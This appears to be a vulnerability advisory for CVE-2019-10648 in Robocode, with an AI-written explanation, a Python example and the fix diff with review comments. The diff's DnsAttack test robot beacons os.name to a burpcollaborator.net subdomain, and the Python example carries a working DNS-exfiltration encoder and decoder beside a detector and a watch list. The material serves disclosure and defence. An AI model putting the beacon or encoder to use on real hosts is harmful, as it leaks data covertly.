VYPR
Critical severity · OSV Advisory · Published Mar 30, 2019 · Updated Aug 4, 2024

CVE-2019-10648

Description

Robocode before 1.9.3.6 allows attackers to force DNS queries to an attacker-controlled domain via a java.net.URL.openStream call bypassing the security manager.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Vulnerability

Robocode runs untrusted robot classes under a custom java.lang.SecurityManager, RobocodeSecurityManager. Before the fix that class overrode checkAccess for threads and thread groups but did not override checkPermission, so java.net permission checks made on behalf of robot threads fell through to the default policy. When robot code calls java.net.URL.openStream(), including from a static initializer that runs while the robot class is still being loaded, the URL's host name is resolved even though the socket connect itself is denied, so a DNS query for an attacker-chosen name leaves the host. Note the two version ranges on this page: the CVE description says versions before 1.9.3.6 are affected, while the GitHub Security Advisory data below lists the Maven artifact net.sf.robocode:robocode.host as affected below 1.9.3.7 with 1.9.3.7 as the patched version. The fix is commit 836c846 (Bug-406) [1][2].

Exploitation

An attacker writes a robot that, when loaded or run by Robocode, calls java.net.URL.openStream() on a URL whose host is a unique name under a DNS zone the attacker controls; the fix's test robot, DnsAttack, does exactly this from a static initializer and puts System.getProperty("os.name") into the leading labels of the name. The authoritative name server for that zone then sees the lookup, together with whatever data was encoded in the labels. No authentication or special privileges are required beyond getting the robot executed, which is the normal way of using Robocode: robots are loaded from the robot folder or installed in bulk for competitions such as the RoboRumble mentioned in the project changelog. The only user interaction is running the battle; the DNS query is the observable external effect [1].

Impact

Successful exploitation causes an outbound DNS query from the host running Robocode to the attacker's name server. Because the attacker chooses the query name, this is a low-bandwidth exfiltration channel for anything the robot can read inside the sandbox (system properties such as os.name in the test robot), and it confirms that a target is running the robot and where its resolver egresses. The primary CIA impact is confidentiality: information disclosure observable on the network, plus a beacon that can serve as reconnaissance for attacks that depend on knowing the host is active [1].
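To make the channel described in the Exploitation and Impact sections concrete, here is an added example; it is not Robocode's code and not part of the original advisory. It models both ends of the DNS exfiltration path: the sandboxed side packs bytes into query names within the RFC 1035 label and name limits, the attacker's authoritative server reassembles them from its query log, and a defender's check flags such names in resolver logs. The zone exfil.example, the log lines, the secret and the watch list are all constructed for the example; burpcollaborator.net is the callback domain hard-coded in the project's DnsAttack test robot, and recover_os_name undoes that robot's space-to-dot encoding of os.name.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed for this example: a hypothetical attacker zone under an RFC 2606
# reserved TLD, so nothing here resolves on a real network.
ATTACKER_ZONE = "exfil.example"
# Watch list: burpcollaborator.net is the callback domain hard-coded in Robocode's
# DnsAttack test robot; the attacker zone above is an assumed extra entry.
CALLBACK_ZONES = ("burpcollaborator.net", ATTACKER_ZONE)
MAX_LABEL = 63   # RFC 1035: a label is at most 63 octets
MAX_NAME = 253   # RFC 1035: a name in presentation form is at most 253 characters


def encode_queries(data: bytes, zone: str = ATTACKER_ZONE) -> List[str]:
    """Sandbox side: pack bytes into names '<seq>.<chunk>[.<chunk>...].<zone>'.
    base32 survives case-insensitive DNS; '=' padding is dropped and restored later."""
    text = base64.b32encode(data).decode("ascii").rstrip("=").lower()
    labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
    names: List[str] = []
    seq = 0
    while labels:
        chunks: List[str] = []
        # Greedily fill one name with as many labels as the 253-character limit allows.
        while labels and len(f"{seq}.{'.'.join(chunks + [labels[0]])}.{zone}") <= MAX_NAME:
            chunks.append(labels.pop(0))
        if not chunks:
            raise ValueError("zone too long to carry even one label")
        names.append(f"{seq}.{'.'.join(chunks)}.{zone}")
        seq += 1
    return names


# Matches the 'query: <name> IN <type>' fragment of a BIND-style query log line.
QUERY_RE = re.compile(r"query:\s+(?P<name>\S+)\s+IN\s+(?P<qtype>\w+)")


def parse_queries(log_lines: List[str]) -> List[str]:
    """Pull queried names out of log lines, preserving case for the caller."""
    found = [QUERY_RE.search(line) for line in log_lines]
    return [m.group("name").rstrip(".") for m in found if m]


def decode_queries(names: List[str], zone: str = ATTACKER_ZONE) -> bytes:
    """Authoritative-server side: reassemble the payload from names under `zone`,
    in sequence order, however the queries arrived."""
    suffix = "." + zone.lower()
    chunks: Dict[int, str] = {}
    for name in names:
        lowered = name.lower()
        if not lowered.endswith(suffix):
            continue
        seq, _, payload = lowered[: -len(suffix)].partition(".")
        if seq.isdigit():
            chunks[int(seq)] = payload.replace(".", "")
    text = "".join(chunks[k] for k in sorted(chunks)).upper()
    return base64.b32decode(text + "=" * (-len(text) % 8))   # restore padding


def recover_os_name(name: str, zone: str = "randomsubdomain.burpcollaborator.net") -> Optional[str]:
    """Undo the DnsAttack test robot's encoding: os.name with spaces replaced by dots."""
    suffix = "." + zone
    if not name.lower().endswith(suffix):
        return None
    return name[: -len(suffix)].replace(".", " ")


def flag_query(name: str) -> List[str]:
    """Defender side: reasons a queried name looks like a callback beacon or exfil carrier."""
    joined = name.rstrip(".").lower()
    labels = joined.split(".")
    reasons = []
    if any(joined == z or joined.endswith("." + z) for z in CALLBACK_ZONES):
        reasons.append("known callback zone")
    if max(len(label) for label in labels) > 40:   # benign labels are rarely this long
        reasons.append("oversized label")
    if len(labels) > 5:
        reasons.append("deep subdomain")
    return reasons


def demo():
    """Round trip over a constructed resolver log; returns (payload, {name: reasons})."""
    secret = b"os.name=Linux;user=robot"   # constructed stand-in for sandbox-readable data
    log = [f"26-Mar-2019 10:00:0{i} client 10.0.0.5#5342{i}: query: {n}. IN A"
           for i, n in enumerate(encode_queries(secret))]
    # Constructed line for what the DnsAttack robot would emit from a Windows 10 host.
    log.append("26-Mar-2019 10:00:05 client 10.0.0.5#53429: query: "
               "Windows.10.randomsubdomain.burpcollaborator.net. IN A")
    log.append("26-Mar-2019 10:00:06 client 10.0.0.7#53430: query: www.example.com. IN A")
    queries = parse_queries(log)
    flagged = {q: flag_query(q) for q in queries if flag_query(q)}
    return decode_queries(queries), flagged
```

demo() returns the recovered payload and the flagged names; applying recover_os_name to the flagged burpcollaborator.net entry yields "Windows 10". The detector's thresholds are starting points rather than tuned values: a beacon like the one the test robot sends has short labels and a shallow depth, so only the watch-list match catches it, while bulk exfiltration of the kind encode_queries produces shows up through label length and depth even against a zone nobody has listed yet.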

Mitigation

The fix (commit 836c846, shipped in Robocode 1.9.3.6 shortly after the disclosure) adds a checkPermission override to RobocodeSecurityManager that, for any thread Robocode does not classify as one of its own safe threads, rejects every java.net.SocketPermission request, which covers the "resolve" action as well as "connect", punishes the offending robot and throws SecurityException with the message "Using socket is not allowed". Upgrade to 1.9.3.6 or later; because the GitHub Security Advisory lists 1.9.3.7 as the patched version of the net.sf.robocode:robocode.host artifact, moving to 1.9.3.7 or later satisfies both sources. No workaround for earlier versions is documented in the advisory. Two caveats for anyone relying on this sandbox: the security manager is skipped entirely when RobocodeProperties.isSecurityOff() is true, so that setting must stay off wherever untrusted robots run, and the java.lang.SecurityManager mechanism itself was deprecated for removal in JDK 17 (JEP 411) and, from JDK 18 on, can only be installed if the JVM is started with -Djava.security.manager=allow [1][2].

AI Insight generated on May 22, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected packages

Versions sourced from the GitHub Security Advisory.

Package                         Ecosystem   Affected versions   Patched versions
net.sf.robocode:robocode.host   Maven       < 1.9.3.7           1.9.3.7

Affected products

3

Patches

1
836c84635e98

Bug-406: DNS interaction is not blocked by Robocode's security manager + test(s) to verify the fix

https://github.com/robo-code/robocode · Flemming N. Larsen · Mar 26, 2019 · via ghsa
6 files changed · +97 −17
  • robocode.host/src/main/java/net/sf/robocode/host/security/RobocodeSecurityManager.java  +22 −4  modified
    @@ -12,7 +12,9 @@
     import net.sf.robocode.host.IThreadManager;
     import net.sf.robocode.io.RobocodeProperties;
     
    +import java.net.SocketPermission;
     import java.security.AccessControlException;
    +import java.security.Permission;
     
     
     /**
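Review bot: `import java.security.AccessControlException;` is kept in this hunk while both visible throw sites later in the file switch from `AccessControlException` to `SecurityException`; if nothing else in the class still references it, drop the import rather than carrying an unused one alongside the new `java.security.Permission` and `java.net.SocketPermission` imports.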
    @@ -49,7 +51,6 @@ public void checkAccess(Thread t) {
     		}
     
     		Thread c = Thread.currentThread();
    -
     		if (isSafeThread(c)) {
     			return;
     		}
    @@ -84,7 +85,7 @@ public void checkAccess(Thread t) {
     			if (robotProxy != null) {
     				robotProxy.punishSecurityViolation(message);
     			}
    -			throw new AccessControlException(message);
    +			throw new SecurityException(message);
     		}
     	}
     
    @@ -94,7 +95,6 @@ public void checkAccess(ThreadGroup g) {
     			return;
     		}
     		Thread c = Thread.currentThread();
    -
     		if (isSafeThread(c)) {
     			return;
     		}
    @@ -123,9 +123,27 @@ public void checkAccess(ThreadGroup g) {
     			String message = "Robots are only allowed to create up to 5 threads!";
     
     			robotProxy.punishSecurityViolation(message);
    -			throw new AccessControlException(message);
    +			throw new SecurityException(message);
     		}
     	}
    +	
    +    public void checkPermission(Permission perm) {
    +		if (RobocodeProperties.isSecurityOff()) {
    +			return;
    +		}
    +		Thread c = Thread.currentThread();
    +		if (isSafeThread(c)) {
    +			return;
    +		}
    +        super.checkPermission(perm);
    +
    +        if (perm instanceof SocketPermission) {
    +    		IHostedThread robotProxy = threadManager.getLoadedOrLoadingRobotProxy(c);
    +        	String message = "Using socket is not allowed";
    +        	robotProxy.punishSecurityViolation(message);
    +            throw new SecurityException(message);
    +        }
    +    }
     
     	private boolean isSafeThread(Thread c) {
     		return threadManager.isSafeThread(c);
    
  • robocode.tests.robots/src/main/java/tested/robots/DnsAttack.java  +18 −0  added
    @@ -0,0 +1,18 @@
    +package tested.robots;
    +
    +public class DnsAttack extends robocode.Robot {
    +	static {
    +		try {
    +			new java.net.URL("http://" + System.getProperty("os.name").replaceAll(" ", ".")
    +					+ ".randomsubdomain.burpcollaborator.net").openStream();
    +		} catch (Exception e) {
    +		}
    +	}
    +
    +	public void run() {
    +		for (;;) {
    +			ahead(100);
    +			back(100);
    +		}
    +	}
    +}
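Review bot: the test robot hard-codes a real third-party callback domain, `".randomsubdomain.burpcollaborator.net"`, so any future regression in the security manager turns a CI run into a live DNS query that carries `os.name` to whoever operates that zone; a name under an RFC 2606 reserved TLD such as `.invalid` or `.test` exercises the same `openStream()` path without reaching a third party. The empty `catch (Exception e) {}` also swallows the SecurityException the fix throws, which works for the test only because `punishSecurityViolation` writes the message to the robot's output before the throw; a one-line comment stating that would save the next reader a trip through the security manager.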
    
  • robocode.tests/src/test/java/net/sf/robocode/test/robots/TestConstructorHttpAttack.java  +5 −6  modified
    @@ -19,7 +19,7 @@
     public class TestConstructorHttpAttack extends RobocodeTestBed {
     
     	private boolean messagedInitialization;
    -	private boolean messagedAccessDenied;
    +	private boolean securityExceptionOccurred;
     	
     	@Override
     	public String getRobotNames() {
    @@ -36,20 +36,19 @@ public void onTurnEnded(TurnEndedEvent event) {
     			messagedInitialization = true;	
     		}	
     
    -		if (out.contains("access denied (java.net.SocketPermission")
    -				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
    -			messagedAccessDenied = true;	
    +		if (out.contains("java.lang.SecurityException:")) {
    +			securityExceptionOccurred = true;	
     		}	
     	}
     
     	@Override
     	protected void runTeardown() {
     		Assert.assertTrue("Error during initialization", messagedInitialization);
    -		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
    +		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
     	}
     
     	@Override
     	protected int getExpectedErrors() {
    -		return hasJavaNetURLPermission ? 3 : 2; // Security error must be reported as an error
    +		return 2;
     	}
     }
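Review bot: `out.contains("java.lang.SecurityException:")` matches any SecurityException the robot prints, not specifically the socket denial; `TestStaticConstructorDnsAttack` in this same commit asserts on the exact `SYSTEM: Using socket is not allowed` line, and matching that here too would keep the three tests consistent and catch a regression where an unrelated SecurityException fires instead. The assertion message `"Socket connection is not allowed"` also reads as the expected behaviour rather than the failure; something like `"expected a SecurityException for the socket connection"` tells the reader what went wrong when it trips.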
    
  • robocode.tests/src/test/java/net/sf/robocode/test/robots/TestHttpAttack.java  +5 −6  modified
    @@ -18,7 +18,7 @@
      */
     public class TestHttpAttack extends RobocodeTestBed {
     
    -	private boolean messagedAccessDenied;
    +	private boolean securityExceptionOccurred;
     	
     	@Override
     	public String getRobotNames() {
    @@ -31,19 +31,18 @@ public void onTurnEnded(TurnEndedEvent event) {
     
     		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
     
    -		if (out.contains("access denied (java.net.SocketPermission")
    -				|| out.contains("access denied (\"java.net.SocketPermission\"")) {
    -			messagedAccessDenied = true;	
    +		if (out.contains("java.lang.SecurityException:")) {
    +			securityExceptionOccurred = true;	
     		}	
     	}
     
     	@Override
     	protected void runTeardown() {
    -		Assert.assertTrue("HTTP connection is not allowed", messagedAccessDenied);
    +		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
     	}
     
     	@Override
     	protected int getExpectedErrors() {
    -		return hasJavaNetURLPermission ? 2 : 1; // Security error must be reported as an error. Java 8 reports two errors.
    +		return 1;
     	}
     }
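Review bot: the removed comment recorded that the expected error count depended on the JDK (`Java 8 reports two errors`), and the replacement `return 1;` drops both the `hasJavaNetURLPermission` branch and any explanation of why the dependence went away. Since the new `checkPermission` still calls `super.checkPermission(perm)` before its own `SocketPermission` test, a policy that denies the connect would surface the JDK's error first, so either a short comment stating why the count is now version-independent or a note that the test was run on both JDKs would justify the hard-coded value.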
    
  • robocode.tests/src/test/java/net/sf/robocode/test/robots/TestStaticConstructorDnsAttack.java  +46 −0  added
    @@ -0,0 +1,46 @@
    +/**
    + * Copyright (c) 2001-2019 Mathew A. Nelson and Robocode contributors
    + * All rights reserved. This program and the accompanying materials
    + * are made available under the terms of the Eclipse Public License v1.0
    + * which accompanies this distribution, and is available at
    + * https://robocode.sourceforge.io/license/epl-v10.html
    + */
    +package net.sf.robocode.test.robots;
    +
    +import net.sf.robocode.test.helpers.RobocodeTestBed;
    +import org.junit.Assert;
    +import robocode.control.events.TurnEndedEvent;
    +
    +/**
    + * @author Flemming N. Larsen (original)
    + */
    +public class TestStaticConstructorDnsAttack extends RobocodeTestBed {
    +
    +	private boolean securityExceptionOccurred;
    +	
    +	@Override
    +	public String getRobotNames() {
    +		return "tested.robots.DnsAttack,sample.Target";
    +	}
    +
    +	@Override
    +	public void onTurnEnded(TurnEndedEvent event) {
    +		super.onTurnEnded(event);
    +
    +		final String out = event.getTurnSnapshot().getRobots()[0].getOutputStreamSnapshot();
    +
    +		if (out.contains("SYSTEM: Using socket is not allowed")) {
    +			securityExceptionOccurred = true;	
    +		}	
    +	}
    +
    +	@Override
    +	protected void runTeardown() {
    +		Assert.assertTrue("Socket connection is not allowed", securityExceptionOccurred);
    +	}
    +
    +	@Override
    +	protected int getExpectedErrors() {
    +		return 1;
    +	}
    +}
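Review bot: `out.contains("SYSTEM: Using socket is not allowed")` couples this test to the string literal in `RobocodeSecurityManager`, so a wording change there silently breaks the test while the protection still works; a shared constant for the message, referenced from both places, avoids that. The assertion proves only that the denial was printed, not when: since the robot triggers the lookup from a static initializer, checking that the message appears in the first turn snapshot would pin down that the block happened during class loading, which is the case this test exists for.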
    
  • versions.md  +1 −1  modified
    @@ -2,7 +2,7 @@
     
     ### Bugfixes
     * [Bug-404][]: Confusion between development/non-development versions of bots
    -	* Rollback of previous attempt to fix issues with the RobocodeEngine, which could not read robots in "developer mode" (marked with a asterix character). Hence the old bug [Bug-398][] is back.
    +	* Rollback of previous attempt to fix issues with the RobocodeEngine, which could not read robots in "developer mode" (marked with a asterix character). Hence the old bug [Bug-398][] has been reintroduced.
     
     ### Changes
     * Fix by Bumfo, which makes Robocode faster at detecting robots in the robot folder, which is crucial for the RoboRumble, when installing or updating a huge amount of robots.
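Review bot: the commit is titled Bug-406, but the only change to versions.md in this hunk is a wording tweak to the Bug-404 entry; the changelog should gain a Bug-406 line stating that the security manager now blocks socket and DNS use by robots, since that is the entry users upgrading for this advisory will look for. While touching these lines, `asterix` in the unchanged context is `asterisk`.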
    

References

5
